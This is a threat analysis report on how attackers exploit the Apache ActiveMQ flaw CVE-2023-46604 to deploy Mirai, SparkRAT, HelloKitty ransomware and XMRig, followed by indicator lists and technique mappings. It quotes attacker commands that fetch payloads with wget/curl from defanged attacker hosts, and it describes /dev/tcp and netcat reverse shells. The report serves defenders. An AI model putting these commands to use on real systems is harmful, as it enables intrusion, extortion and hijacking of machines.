Stellar Discovery of A New Cluster of Andromeda/Gamarue C2
In this Threat Analysis report, Cybereason investigates incidents relating to the Andromeda backdoor and a new cluster of C2 servers.
Cybereason Security Services issues Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.
In this Threat Analysis Report, Cybereason Security Services examines an incident on a Linux server, which saw malicious shell (bash) executions from a Java process running Apache ActiveMQ. The ActiveMQ service is an open-source message broker used to bridge communications from separate servers running different components and/or written in different languages.
This activity is strongly assessed to have leveraged a Remote Code Execution (RCE) vulnerability that was disclosed on October 27th as CVE-2023-46604. The observed shell executions include attempts to download additional payloads such as executables of Mirai Botnet, HelloKitty Ransomware, SparkRAT executables, and coinminers including XMRig. The deployment methodologies mainly employ automation; however, one initial foothold is dependent on an interactive session via Netcat reverse shells.
Threat actors have been leveraging the exploit since October 11th, and due to the variety of attacks seen on the machine, Cybereason believes the incident involves multiple threat actors.
Example Flow Of Messaging System
Apache ActiveMQ is an open source Java-based message broker, which supports message based systems that require asynchronous communication between the server and the client. ActiveMQ’s technology is often beneficial for a few reasons:
ActiveMQ currently has two versions:
ActiveMQ also supports various protocols such as AMQP, MQTT, STOMP, and OpenWire.
This section covers an overview of CVE-2023-46604 and analyzes three initial footholds abusing the exploit.
Exploitation of the CVE-2023-46604 vulnerability allows attackers to execute unauthenticated RCE on machines running vulnerable Apache ActiveMQ Artemis and Classic. The versions affected by CVE-2023-46604 are as follows.
Example CVE-2023-46604 Exploit Flowchart
The vulnerability occurs due to insecure deserialization of the OpenWire protocol, which allows attackers to manipulate serialized class types to execute arbitrary code. Exploitation of the CVE-2023-46604 vulnerability is possible by using the OpenWire command EXCEPTION_RESPONSE that abuses ClassPathXmlApplicationContext included in the Spring Framework bundled in ActiveMQ. The class ClassPathXmlApplicationContext allows users to load XML application configuration files across the network via HTTP and attackers can embed arbitrary code within this XML file to execute RCE.
Example XML Application Configuration File
Example Exploitation Of CVE-2023-46604
Upon successful remote code execution on Apache ActiveMQ, the most commonly observed behaviors were attempts to download additional payloads using two separated download commands: wget and curl.
Observed Download Activity After ActiveMQ Exploitation
These two commands can be used seamlessly across different Unix architectures, which drastically improve the chances of successfully downloading additional payloads. Below are some examples that were observed to use this technique.
Mirai botnet downloader was amongst one of many download activities observed leveraging the ActiveMQ vulnerability to infect the device. The payload attempts to execute a command wget hxxp://82.115.220[.]81/bins/x86 and curl hxxp://82.115.220[.]81/bins/x86 to download the ELF 32-bit binary x86.
Execution Flow Of Observed Download Activity For Mirai Botnet
In the second example, the download activity led to the execution of a cross-platform Remote Administration Tool (RAT) written in Golang known as SparkRAT.
Content Of Script linux.sh
The curl command downloads linux.sh from 45.32.120[.]181. Within linux.sh, it contains commands to download two separate binaries (l and l_x86) and outputs the file as .X12-unix. Simultaneously, .X12-unix is given full file privilege (777) via chmod and executes > /dev/null to discard any logs produced by .X12-unix in the background. The download activity is observed as observed in the screenshot below.
Download Of l & l_x86 & Output To tmp Folder As .X12-unix
The two downloaded files could represent different versions (32/64 bit) or may be necessary to satisfy multiple dependencies to successfully run the program. In this case, file l has a corrupt header preventing successful execution, whilst l_x86 is able to execute successfully. The download of two files may indicate anticipation by the threat attacker to execute the payload successfully regardless of the CPU architecture.
Taking a deeper look at l_x86, the binary contains build configuration referencing what appears to be part of SparkRAT configuration (Spark/client/config) as well as a network activity using the built-in checkUpdate functionality.
SparkRAT Binary Build Information
Bash executes 1.sh and 2.sh located on a remote IP address (156.96.155[.]233).
Process tree of initial foothold related to CoinMiner
The command includes a list of instructions to download a file: Linux64. In this case, the execution fails to download the file on the machine. The remote address (156.96.155[.]233) has been observed in the past distributing CoinMiners such as Xmrig.
Content Of 1.sh Script Attempting To Download Linux64
In this instance, it attempts to make a connection to a remote address (176.105.255[.]60) over port 8080 to fetch a file YqA4eE7nQGlrOXB6snEZqA. The downloaded binary as well as the remote IP address have been associated with the ConnectBack family, which is a set of backdoors/reverse shells available for Unix-based systems. ConnectBack simply opens a remote connection to the attacker giving full access and control of an infected system.
Command-Line Attempting To Download Yqa4ee7nqglroxb6snezqa
Overview of Initial Foothold Two
Unlike the Initial Foothold One, the second methodology attempts executing Base64 encoded commands. The decoded commands are similar to first methodologies where the threat actor relies on curl and wget commands to retrieve the necessary payloads. The execution flow eventually leads to deployment and execution of HelloKitty Ransomware.
Process Tree Of Observed Initial Foothold Two
Base64 Encoded Bash Command
The Base64 encoded commands consist of three sections responsible for the following:
The decoded Base64 commands consist of commands curl and wget, both retrieving payload down from the C2 server (172.245.16[.]125).
List of base64 decoded commands
Successful retrieval of down content leads to execution of conditional statements as seen in the next section.
HelloKitty Ransomware is a ransomware program that’s been around since 2020, and has been used in several high profile ransomware attacks. HelloKitty Ransomware supports not only Windows, but also Linux and targeted VMWare ESXi platform in the past. In early October 2023, BleepingComputer reported that the ransomware’s source code leaked in a Russian-speaking hacking forum by a third party threat actor, which may lead to other threat actors abusing the leaked HelloKitty Ransomware.
Process Tree Of Observed Initial Foothold Two
Once the curl or wget command retrieves content of down, execution proceeds to execute a bash command consisting of if-else statements, responsible for checking and downloading the HelloKitty Ransomware ss64 from the C2 server (172.245.16[.]125).
Bash Execution Flowchart
Once execution flow successfully downloads ss64 and saves HelloKitty Ransomware Golang binary as .bash2, bash proceeds to execute .bash2 with no hang up command nohup. The command nohup prevents the process being stopped, specifically .bash2 in this case.
The execution of .bash2 consists of the following steps:
.Bash2 Stopping Database Services
Part Of Hellokitty Ransomware Ransom Note
Lateral Movement Attempt Via SSh
Initial Foothold Three consists of command execution to set up a reverse shell on a target machine. The threat actor is using the following two methods in order to gain foothold on the environment;
It is key to note that this activity came after the execution of HelloKitty Ransomware. In this case, the threat actor first enumerates the machine and then deletes files that may be associated with the aforementioned activities before facilitating its own malicious activity.
Broad Overview Of Initial Foothold Three
Two distinctive commands from 38.54.88[.]83 and 91.192.223[.]44 have been observed following the exploitation of the ActiveMQ vulnerability. The screenshot below illustrates a TCP reverse shell payload using a combination of two methods that allow the creation of a reverse shell.
The first command uses a file descriptor of bash shell /dev/tcp/<hostname>/<port> to open a socket to (38.54.88[.]83) listening on port 9099. Using a file descriptor to establish a reverse shell is a reliable method as it is portable, universally used across Unix systems and doesn't have to rely on having Telnet or NetCat packages installed on the target Unix/Linux system.
Reverse Shell Command-Line Example 2
The second command uses the nc command (NetCat utility) with the nc -e bash option to create a reverse shell. Threat actors may combine both file descriptor and NetCat methods in order to increase its chance of successfully establishing a reverse shell as depending on the versions of NetCat, nc -e option, may be unsupported or disabled for security reasons.
Reverse Shell Command-Line Example 2
In this second example, the command attempts to create a reverse shell by opening a network connection to a target (91.192.223[.]44) over port 29123, where sh is used to interact with the victim host. In this instance, it specifies a file descriptor number 171, and in the exec 171<> command, it associates 171 with a file used for reading and writing.
The observed interactive activities occurred over three distinct phases.
The interactive activity started by gaining insights into the file structure and user privileges using commands such as ls and whoami. From there, the threat actor employed cat to display content of files, including files linked with HelloKitty Ransomware (.bash2, public1.txt, README1.html and encfile1.txt) and command execution history (.bash_hi).
Viewing Files Using Cat Command
After enumeration, the threat actor attempted to spin up a default HTTP server via python -m http.server command. The default web server opened a listener on port 8000, however, the process ended immediately after its execution.
Starting Up An HTTP Server
Soon after the HTTP server ended, the threat actor proceeded to install python3 and netstat. It is assessed that the actor may have encountered problems when starting up the HTTP server, such as:
Installing Python And Netstat
The threat actor also went on to delete files found during the enumeration phase.
Removing Files Found In The Enumeration Phase
In the final phase, the threat actor ran a curl command to download XMRig from transfer[.]sh/EewPaMsAUA/xmrig. As the file name suggests, the file is an XMRig coinminer.
Curl To Download XMRig Binary And XMRig Version From 38.54.88[.]83
transfer[.]sh is a public file-sharing service that allows users to upload and share files. It is a legitimate service that malicious actors leverage to host malicious files. In this case, it hosts an XMRig file.
Transfer.Sh Hosting XMRig
Unlike in the reverse shell activity from 38.54.88[.]83, reverse shell activity from 91.192.223[.]44 only made attempts to fetch a file named jQ using both wget and curl commands and saved the file in /var/tmp/java folder.
Downloading jQ From 91.192.223[.]44
The jQ payload has been identified as XMRigCC. XMRigCC is an XMRig coinminer; however, it contains additional features such as remote control and monitoring functionality providing more control to the operator.
|
Type |
Value |
Comment |
|
IP |
34.100.208[.]153 |
IP address scanning ApacheMQ port |
|
IP |
87.236.176[.]25 |
IP address scanning ApacheMQ port |
|
IP |
65.49.1[.]38 |
IP address scanning ApacheMQ port |
|
IP |
87.236.176[.]108 |
IP address scanning ApacheMQ port |
|
IP |
167.248.133[.]52 |
IP address scanning ApacheMQ port |
|
IP |
194.165.16[.]111 |
IP address scanning ApacheMQ port |
|
IP |
162.142.125[.]216 |
IP address scanning ApacheMQ port |
|
IP |
199.45.155[.]17 |
IP address scanning ApacheMQ port |
|
IP |
184.105.247[.]254 |
IP address scanning ApacheMQ port |
|
IP |
178.32.197[.]83 |
IP address scanning ApacheMQ port |
|
IP |
68.69.186[.]14 |
IP address scanning ApacheMQ port |
|
IP |
165.22.16[.]135 |
IP address scanning ApacheMQ port |
|
IP |
82.115.220[.]81 |
C2 Server hosting Mirai Bot |
|
IP |
45.32.120[.]181 |
IP address for initial C2 connectivity (SparkRAT) |
|
IP |
172.245.16[.]125 |
IP address hosting HelloKitty Ransomware |
|
IP |
156.96.155[.]233 |
IP address hosting XMRig payload |
|
IP |
27.102.128[.]152 |
IP address hosting .ico files |
|
IP |
38.54.88[.]83 |
IP address used for reverse shell |
|
SHA256 |
01c6c81abf1206caf6c4004bae8c4999624228c8b1ce7514503e4150c10c21b5 |
XMRig payload |
|
SHA256 |
6cb3d4d12357c63e654cf8c7062df0b07d22cf676307598bbf703de5258da519 |
Decoy file downloaded prior to l_x86 |
|
SHA256 |
cdc6e88a31e3a6f559b33b1249a5c4fa44f8c254b2437a5b6b06ff8c8c4d4c1d |
32-bit version of SparkRAT |
|
SHA256 |
c0cc0fcbbef380108d7522a778c0beb5e0ecc876bb7dd12bcbcea40ded39f321 |
Mirai Bot |
|
SHA256 |
7af5c37cc308a222f910d6a7b0759837f37e3270e22ce242a8b59ed4d7ec7ceb |
HelloKitty Ransomware |
|
URL |
hxxps://transfer[.]sh/EewPaMsAUA/xmrig |
URL redirecting to download XMRig payload |
|
URL |
hxxp://27.102.67[.]64:5678/fav.ico |
URL downloading .ico file |
|
URL |
hxxp://91.192.223[.]44:9333/jQ |
URL to download XMRig. |
|
URL |
hxxp://172.245.16[.]125/.exec |
URL for HelloKitty Ransomware payload |
|
URL |
hxxp://172.245.16[.]125/down |
URL related to HelloKitty Ransomware |
|
URL |
hxxp://172.245.16[.]125/already |
URL related to HelloKitty Ransomware |
|
URL |
hxxp://172.245.16[.]125/curlfinish |
URL related to HelloKitty Ransomware |
|
URL |
hxxp://172.245.16[.]125/wgetfinish |
URL related to HelloKitty Ransomware |
|
URL |
hxxp://45.32.120[.]181/linux.sh |
URL for shell script which is responsible for downloading SparkRAT |
|
URL |
hxxp://156.96.155[.]233:8855/2.sh |
URL for shell script |
|
URL |
hxxp://156.96.155[.]233:8855/1.sh |
URL for shell script |
|
URL |
hxxp://27.102.128[.]152:8098/bit.ico |
URL for ico file download |
|
URL |
hxxp://27.102.128[.]152:5678/fav.ico |
URL for ico file download |
|
URL |
hxxp://82.115.220[.]81/bins/x86 |
URL to fetch Mirai Bot payload |
|
URL |
hxxp://153.92.1[.]49:82/e.sh |
URL for shell script |
|
URL |
hxxp://153.92.1[.]49:81/c.sh |
URL for shell script |
|
URL |
hxxp://153.92.1[.]49:83/wk.sh |
URL for shell script |
The Cybereason Defense Platform can detect and prevent post-exploitation observed in attacks related to Apache ActiveMQ exploitation. Cybereason recommends the following actions:
|
Tactic |
Techniques / Sub-Techniques |
|
TA0001: Initial Access |
T1190 – Exploit Public-Facing Applications |
|
TA0002: Execution |
T1059 – Command and Scripting Interpreter |
|
TA0003: Persistence |
T1546.016 - Event Triggered Execution: Installer Packages |
|
TA0005: Defense Evasion |
T1027 – Obfuscated Files or Information |
|
TA0010: Exfiltration |
T1041 – Exfiltration Over C2 Channel |
|
TA0010: Exfiltration |
T1567 – Exfiltration Over Web Service |
|
TA0011: Command and Control |
T1071.001 – Application Layer Protocol: Web Protocols |
|
TA0040: Impact |
T1485 - Data Destruction |
|
TA0040: Impact |
T1486 - Data Encryption for Impact |
|
TA0042: Resource Development |
T1584.005 - Compromise Infrastructure: Botnet |
Robin Plumer, Senior Security Analyst, Cybereason Global SOC
Robin Plumer is a Security Analyst with the Cybereason Global SOC team. He is engaged in analyzing and triaging malware operations and researching new and emerging threats. He earned his bachelor’s degree in cybersecurity management from Bournemouth University, UK.
KengWei, Lin, Security Analyst, Cybereason Global SOC
KengWei-Lin is a Security Analyst with the Cybereason Global SOC team. He is involved in triage and analysis of Malware alerts, proactive hunting, and proactive tuning of client environments. He is heavily invested in Cybersecurity studies including malware analysis and testing.
Kotaro Ogino, Principal Security Analyst, Cybereason Global SOC
Kotaro Ogino is a Senior Security Analyst with the Cybereason Global SOC team. He is involved in threat hunting and Extended Detection and Response (XDR). Kotaro has a bachelor of science degree in information and computer science.
Cybereason is dedicated to teaming with Defenders to end cyber attacks from endpoints to the enterprise to everywhere. Learn more about Cybereason XDR powered by Google Chronicle, check out our Extended Detection and Response (XDR) Toolkit, or schedule a demo today to learn how your organization can benefit from an operation-centric approach to security.
In this Threat Analysis report, Cybereason investigates incidents relating to the Andromeda backdoor and a new cluster of C2 servers.
In this Threat Analysis Report, Cybereason Security Services dives into the Python Infostealer, delivered via GitHub and GitLab, that ultimately exfiltrates credentials via Telegram Bot API or other well known platforms.